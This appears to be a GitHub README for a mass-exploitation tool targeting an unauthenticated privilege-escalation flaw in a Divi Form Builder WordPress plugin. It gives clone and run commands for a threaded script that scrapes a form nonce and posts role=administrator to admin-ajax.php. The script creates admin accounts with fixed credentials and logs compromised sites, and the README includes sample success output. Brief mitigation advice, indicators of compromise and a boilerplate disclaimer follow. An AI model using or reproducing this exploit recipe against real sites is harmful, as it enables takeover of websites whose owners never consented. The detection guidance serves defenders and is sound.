Jenderal92/CVE-2026-5118

# Divi Form Builder <= 5.1.2 - Unauthenticated Privilege Escalation via 'role' ## Overview This Python 2 script exploits a privilege escalation vulnerability in the **Divi WordPress plugin** (and related Divi forms). It allows remote registration of an **administrator** account by: - Extracting the `fb_nonce` from the target's Divi registration form. - Sending a crafted multipart request to `/wp-admin/admin-ajax.php` with `role=administrator`. - Automatically detecting success and saving compromised admin URLs. ## Features ## Requirements - **Python 2.7** (uses `urllib2`, `Queue`, `threading` – not compatible with Python 3 without modifications) - A list of target URLs (one per line) ## Installation git clone https://github.com/Jenderal92/CVE-2026-5118.git cd CVE-2026-5118 chmod +x CVE-2026-5118.py ## Usage ### 1. Prepare target list Create a text file with one domain or URL per line. You can omit `http://` / `https://` – the script will add `https://` by default. **Example `targets.txt`:** example.com https://vulnerable-site.com http://127.0.0.1/wordpress test-site.org ### 2. Run the exploit python CVE-2026-5118.py targets.txt ### 3. Output example [*] Total targets : 4 [*] Credentials : Attacker / Attacker@123#+ [*] Threads : 20 [*] Output file : results.txt [1] Checking https://example.com [+] SUCCESS! https://example.com/wp-admin/ [2] Checking https://vulnerable-site.com [+] SUCCESS! https://vulnerable-site.com/wp-admin/ [3] Checking http://192.168.1.100/wordpress [3] FAILED http://192.168.1.100/wordpress [4] Checking https://test-site.org [4] FAILED https://test-site.org === DONE === Successful: 2 / 4 ### 4. Results file (`results.txt`) https://example.com/wp-admin/|Attacker|Attacker@123#+ https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+ ## Configuration You can customise the following variables at the top of the script: | Variable | Default | Description | |----------|---------|-------------| | `DEFAULT_USERNAME` | `Attacker` | Username to register | | `DEFAULT_PASSWORD` | `Attacker@123#+` | Password (strong with special characters) | | `DEFAULT_EMAIL` | `mail@admin.com` | Email address | | `THREAD_COUNT` | `20` | Number of concurrent threads | | `OUTPUT_FILE` | `results.txt` | File to save successful targets | ## How It Works 1. **Normalise URL** – adds `https://` if no scheme is provided. 2. **Extract nonce** – fetches the homepage (or registration page) and searches for `fb_nonce` using regex patterns. 3. **Build request** – constructs a `multipart/form-data` POST containing: - `action=de_fb_ajax_submit_ajax_handler` - `fb_nonce=` - `role=administrator` - `de_fb_user_login` / `user_login` - `de_fb_user_pass` / `user_pass` - `de_fb_user_email` / `user_email` 4. **Send to admin‑ajax.php** – if the response contains any success keywords, the target is marked as vulnerable. 5. **Save result** – writes the admin URL and credentials to the output file. ## Detection & Mitigation **For WordPress administrators using Divi:** - Update Divi and all associated plugins to the latest version. - Disable public registration if not needed. - Use a security plugin (Wordfence, Sucuri) to monitor `admin-ajax.php` requests. - Implement reCAPTCHA on all registration forms. - Never expose registration forms with a `role` parameter that can be manipulated. **Indicators of compromise (IOCs):** - Unexpected `admin-ajax.php` requests with `action=de_fb_ajax_submit_ajax_handler` - New administrator users with suspicious usernames (e.g. `Attacker`) - POST data containing `role=administrator` in access logs ## Legal Disclaimer This software is provided for **educational purposes** and **authorised security testing only**. The author assumes no liability for misuse or damage caused by this tool. By using this software, you agree to: - Obtain **written permission** from the system owner before testing. - Comply with all applicable laws (CFAA, Computer Misuse Act, UU ITE, etc.). - Immediately delete any unauthorised access obtained. - Report vulnerabilities responsibly to the affected vendor. **Violating these terms may result in criminal prosecution, fines, or imprisonment.**